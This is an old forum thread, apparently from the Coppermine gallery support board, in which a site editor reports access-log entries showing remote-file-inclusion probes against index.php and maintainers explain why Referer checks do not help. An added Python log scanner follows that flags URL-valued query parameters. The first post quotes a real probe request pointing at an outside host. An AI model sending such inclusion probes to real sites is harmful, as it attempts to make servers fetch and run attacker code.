I suppose it's security issue
 


Started by natalina, September 14, 2008, 07:38:26 PM


natalina

Hi, I've just found something strange. My gallery's index page is index.php, and until yesterday I had a login form and a language bar. Occasionally last night I found strange logs (Apache). They look like: GET /architect_gallery/index.php?id=http://www.donche.net/donche.txt HTTP/1.1" 200 65612 "-" "Mozilla/3.0 (compatible; Indy Library)" So if you add id= http.bla.bla.com/ bla txt or php, Coppermine thinks it's OK. As a result you will see this strange referrer in your code, not only on the index page but everywhere (if you have a login form). Maybe I'm wrong (hope so!) but I'm afraid that this way somebody can inject some kind of virus into the site. The file donche.txt seems very suspicious to me. I am an editor and my knowledge is too poor, but I decided to share my notices in order to prevent troubles. Sorry for my English :)

Nibbler

People scan for vulnerable websites all the time, don't worry about it.

natalina

Thank you so much :), but I would like to know if I can add to login.php something like: if referrer is "index.php id=http", $referer = "goaway.php" else if ...... Because of my poor PHP I can't write this condition properly (:

Joachim Müller

The attacker will stop sending referers if you check them.

natalina

Thank you :) I do check it, but he (or they) has a few addresses (I discovered 4 sites). I'm afraid that he'll use another address. One of them is at geocity, another is phase-lm.co.uk, etc...

Joachim Müller

The referer address can be spoofed (faked) or the attacker can set up his attacking script to just stop sending the referers at all. So there is no use in checking them.
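
Added example, not part of the original thread or of Coppermine: a small Python log check that flags the kind of request shown in the first post, where a query parameter's value is itself a remote URL. It keys on the request line rather than the Referer header, since the Referer can be faked or omitted; the sample log lines, IP addresses and example.invalid host are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line and status as they appear in Apache common/combined log format.
REQUEST_RE = re.compile(r'(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/\d\.\d" (?P<status>\d{3}) ')
# A parameter value that is itself a remote URL (the pattern in the thread's log line).
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_url_params(log_line):
    """Return a list of findings for one access-log line.

    Each finding holds the requested path, the parameter name, the remote
    URL passed as its value, and the response status.
    """
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    parts = urlsplit(match.group("uri"))
    findings = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            findings.append({
                "path": parts.path,
                "param": name,
                "remote_url": value,
                "status": int(match.group("status")),
            })
    return findings


# Constructed sample lines; addresses, host names and timestamps are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2008:03:12:45 +0000] "GET /architect_gallery/index.php?id=http://example.invalid/probe.txt HTTP/1.1" 200 65612 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '192.0.2.10 - - [14/Sep/2008:03:12:46 +0000] "GET /architect_gallery/index.php?id=http%3A%2F%2Fexample.invalid%2Fprobe.txt HTTP/1.1" 200 65612 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '192.0.2.20 - - [14/Sep/2008:09:00:01 +0000] "GET /architect_gallery/index.php?cat=3 HTTP/1.1" 200 41230 "http://example.invalid/" "Mozilla/5.0"',
]


def scan(lines):
    """Collect findings across all lines."""
    return [f for line in lines for f in find_remote_url_params(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on such a line only shows that index.php was served; it does not by itself show that the remote file was fetched or included.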